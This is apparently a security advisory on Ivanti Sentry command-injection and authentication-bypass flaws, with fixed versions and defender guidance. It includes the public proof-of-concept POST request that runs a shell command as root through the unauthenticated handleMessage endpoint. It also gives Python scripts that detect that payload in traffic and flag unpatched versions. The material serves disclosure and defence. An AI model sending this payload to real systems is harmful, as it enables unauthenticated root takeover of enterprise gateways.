Remote Code Execution and Unauthorized Admin Account Creation in Ivanti Sentry Expose Critical Security Risks
Critical vulnerabilities in Ivanti Sentry have been disclosed, allowing remote unauthenticated attackers to execute arbitrary commands with root privileges (CVE-2026-10520) and create administrative accounts without authentication (CVE-2026-10523). Organizations using affected versions must urgently update their systems to mitigate these severe risks. A public proof-of-concept exploit is available, heightening the urgency for immediate action.
Summary
On June 9, 2026, Ivanti released a security advisory detailing two critical vulnerabilities in its Sentry product, formerly known as MobileIron Sentry. The most severe vulnerability (CVE-2026-10520) allows remote unauthenticated users to execute arbitrary commands with root privileges due to an OS command injection flaw. A second vulnerability (CVE-2026-10523) permits attackers to bypass authentication and create administrative accounts. Ivanti has not reported any known exploitation of these vulnerabilities at the time of disclosure, but given their critical nature and the availability of a public proof-of-concept exploit, organizations are advised to prioritize patching.
What Happened
Ivanti Sentry, an in-line gateway for managing mobile device traffic within enterprise systems, is vulnerable due to two critical security flaws. The first vulnerability, CVE-2026-10520, involves an OS command injection flaw with a CVSS score of 10.0. This flaw allows attackers to execute arbitrary commands as root on affected systems without authentication. The second vulnerability, CVE-2026-10523, scores 9.9 on the CVSS scale and enables unauthenticated attackers to create administrative accounts, granting full access.
Technical Details
The OS command injection vulnerability (CVE-2026-10520) resides in the ConfigServiceController class of the Sentry web application. Attackers can exploit this by sending a POST request to an unauthenticated endpoint (/mics/api/v2/sentry/mics-config/handleMessage). This allows attackers to inject and execute arbitrary OS commands with root privileges.
The authentication bypass vulnerability (CVE-2026-10523) also resides within the same application, allowing attackers to create administrative accounts without needing valid credentials. Both vulnerabilities are present in versions before R10.5.2, R10.6.2, and R10.7.1 of Ivanti Sentry.
Proof of Concept
A public proof-of-concept exploit for CVE-2026-10520 is available at watchTowr's GitHub repository. This PoC demonstrates how an attacker can execute commands on a vulnerable system. Below is an example of the HTTP request used in the proof-of-concept:
POST /mics/api/v2/sentry/mics-config/handleMessage HTTP/1.1
Host: [redacted]
User-Agent: python-requests/2.33.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 161
message=execute+system+%2Fconfiguration%2Fsystem%2Fcommandexec+%3Ccommandexec%3E%3Cindex%3E1%3C%2Findex%3E%3Creqandres%3Eid%3C%2Freqandres%3E%3C%2Fcommandexec%3E
This PoC allows attackers to execute system commands such as uname -a on affected systems, confirming the vulnerability's exploitability.
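For detection, the useful observation is that the body above is ordinary form encoding: `message` URL-decodes to `execute system /configuration/system/commandexec <commandexec><index>1</index><reqandres>id</reqandres></commandexec>`, so the command the PoC runs is carried in the reqandres element and the target is the unauthenticated handleMessage path named above. The following script is an added example written for this page, not code from the advisory, Rapid7 or watchTowr: it parses raw HTTP requests (for instance from a reverse-proxy capture or a PCAP export), decodes the form body and flags POSTs to that endpoint whose decoded message contains a commandexec element. The sample requests and the Host value are constructed; `VULN_PATH` is the path quoted in the Technical Details section.

```python
import re
from urllib.parse import parse_qs

# Unauthenticated endpoint named in the advisory text.
VULN_PATH = "/mics/api/v2/sentry/mics-config/handleMessage"

# The PoC request shown above, reconstructed as a constructed sample; the Host
# value is a placeholder, not taken from any real capture.
POC_REQUEST = (
    "POST /mics/api/v2/sentry/mics-config/handleMessage HTTP/1.1\r\n"
    "Host: sentry.example.internal\r\n"
    "User-Agent: python-requests/2.33.0\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 161\r\n"
    "\r\n"
    "message=execute+system+%2Fconfiguration%2Fsystem%2Fcommandexec+"
    "%3Ccommandexec%3E%3Cindex%3E1%3C%2Findex%3E%3Creqandres%3Eid"
    "%3C%2Freqandres%3E%3C%2Fcommandexec%3E"
)

# Constructed negative control: an ordinary request to a different path.
BENIGN_REQUEST = (
    "GET /mics/login.jsp HTTP/1.1\r\n"
    "Host: sentry.example.internal\r\n"
    "\r\n"
)

# The command the PoC runs sits inside the <reqandres> element of the decoded message.
REQANDRES_RE = re.compile(r"<reqandres>(.*?)</reqandres>", re.S | re.I)


def parse_raw_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _ = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    # Drop any query string so the path comparison is exact.
    return method, target.split("?", 1)[0], headers, body


def decode_message(body):
    """Return the form-decoded 'message' parameter ('+' and %XX escapes resolved)."""
    params = parse_qs(body, keep_blank_values=True)
    return params.get("message", [""])[0]


def classify(raw):
    """Flag a request that targets the handleMessage endpoint with a commandexec payload."""
    method, path, headers, body = parse_raw_request(raw)
    message = decode_message(body) if method.upper() == "POST" else ""
    hits_endpoint = path == VULN_PATH
    has_commandexec = "commandexec" in message.lower()
    match = REQANDRES_RE.search(message)
    return {
        "method": method,
        "path": path,
        "hits_endpoint": hits_endpoint,
        "has_commandexec": has_commandexec,
        "command": match.group(1).strip() if match else None,
        "decoded_message": message,
        # High-confidence indicator: unauthenticated endpoint plus a command-execution element.
        "suspicious": hits_endpoint and has_commandexec,
    }


def triage(requests):
    """Return the classification of every request that looks like exploitation."""
    return [r for r in (classify(raw) for raw in requests) if r["suspicious"]]


if __name__ == "__main__":
    for hit in triage([POC_REQUEST, BENIGN_REQUEST]):
        print(f"{hit['method']} {hit['path']} -> command={hit['command']!r}")
```

Because the check runs on the decoded message, variations in percent-encoding or `+` versus `%20` normalise to the same string before matching. The commandexec test is the high-confidence signal; the path match alone is weaker but still worth reviewing, since the endpoint requires no authentication and any POST to it from outside the expected management network is unexpected. Note that standard access logs do not record POST bodies, so this needs a capture source that does (reverse proxy with body logging, IDS, or PCAP).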
Affected Products and Fixed Versions
The vulnerabilities affect Ivanti Sentry versions before R10.5.2, R10.6.2, and R10.7.1. Organizations running these versions should update to one of the fixed releases to mitigate the risks associated with these critical vulnerabilities.
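"Before R10.5.2, R10.6.2, and R10.7.1" has to be read per release branch: an R10.6.0 install is affected even though 10.6.0 is numerically above 10.5.2. The script below is an added example for this page, not Ivanti's or Rapid7's code, that applies that reading to a fleet inventory: it parses Sentry version strings, compares each against the fixed release of its own branch, and lists hosts that still need action. The branch mapping is this example's interpretation of the advisory wording, versions in branches the advisory does not name are sent for manual review rather than guessed at, and the inventory hostnames and versions are constructed placeholders.

```python
import re

# Fixed releases named in the advisory, keyed by release branch. The branch
# split is this example's interpretation of "before R10.5.2, R10.6.2, and R10.7.1".
FIXED_BY_BRANCH = {
    (10, 5): (10, 5, 2),
    (10, 6): (10, 6, 2),
    (10, 7): (10, 7, 1),
}

VERSION_RE = re.compile(r"^R?(\d+)\.(\d+)\.(\d+)$", re.I)


def parse_version(text):
    """Turn 'R10.5.1' or '10.5.1' into a comparable (major, minor, patch) tuple."""
    match = VERSION_RE.match(text.strip())
    if not match:
        raise ValueError(f"unrecognised Sentry version string: {text!r}")
    return tuple(int(part) for part in match.groups())


def assess(version):
    """Classify one installed version as 'fixed', 'vulnerable' or 'review'."""
    parsed = parse_version(version)
    fixed = FIXED_BY_BRANCH.get(parsed[:2])
    if fixed is None:
        # Branch not named in the advisory (e.g. an older line): the page does not
        # state its status, so this example sends it for manual review rather than guessing.
        return "review"
    return "fixed" if parsed >= fixed else "vulnerable"


def triage_inventory(inventory):
    """Return {host: status} for every host not confirmed fixed, vulnerable hosts first."""
    results = {host: assess(ver) for host, ver in inventory.items()}
    order = {"vulnerable": 0, "review": 1}
    return dict(sorted(
        ((host, status) for host, status in results.items() if status != "fixed"),
        key=lambda item: order[item[1]],
    ))


# Constructed inventory; hostnames and versions are placeholders.
SAMPLE_INVENTORY = {
    "sentry-a.example.internal": "R10.5.1",
    "sentry-b.example.internal": "R10.6.2",
    "sentry-c.example.internal": "R10.7.0",
    "sentry-d.example.internal": "R10.4.3",
}

if __name__ == "__main__":
    for host, status in triage_inventory(SAMPLE_INVENTORY).items():
        print(f"{status:10s} {host} ({SAMPLE_INVENTORY[host]})")
```

Feed `triage_inventory` the version strings exported from your asset inventory or pulled from each appliance's admin interface; anything that comes back as `review` means the advisory does not cover that branch and Ivanti's guidance should be checked directly before assuming it is safe.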
Exploitation Status
While no known exploitation has been reported by Ivanti at the time of disclosure, the availability of a public proof-of-concept exploit increases the likelihood of active exploitation in the wild. Organizations are strongly advised to act swiftly to update their systems and prevent potential attacks.
What Remains Unclear
The extent of potential exploitation remains unclear, as no specific incidents have been reported by Ivanti. It is also unknown how widely the affected versions are deployed across organizations, which affects the urgency and scale of the remediation effort required.
Defender Guidance
Organizations should immediately update their Ivanti Sentry installations to versions R10.5.2, R10.6.2, or R10.7.1 to mitigate these vulnerabilities. Additionally, they should monitor for any signs of unauthorized access or unusual activity on affected systems and consider conducting a security audit to ensure no exploitation has occurred prior to patching.
Sources
- https://www.rapid7.com/blog/post/etr-cve-2026-10520-cve-2026-10523-multiple-critical-vulnerabilities-affecting-ivanti-sentry
- https://hub.ivanti.com/s/article/Security-Advisory-Ivanti-Sentry-CVE-2026-10520-CVE-2026-10523?language=en_US
- https://github.com/watchtowrlabs/watchTowr-vs-Ivanti-Sentry-RCE-CVE-2026-10520-CVE-2026-10523
- https://www.cve.org/CVERecord?id=CVE-2026-10520
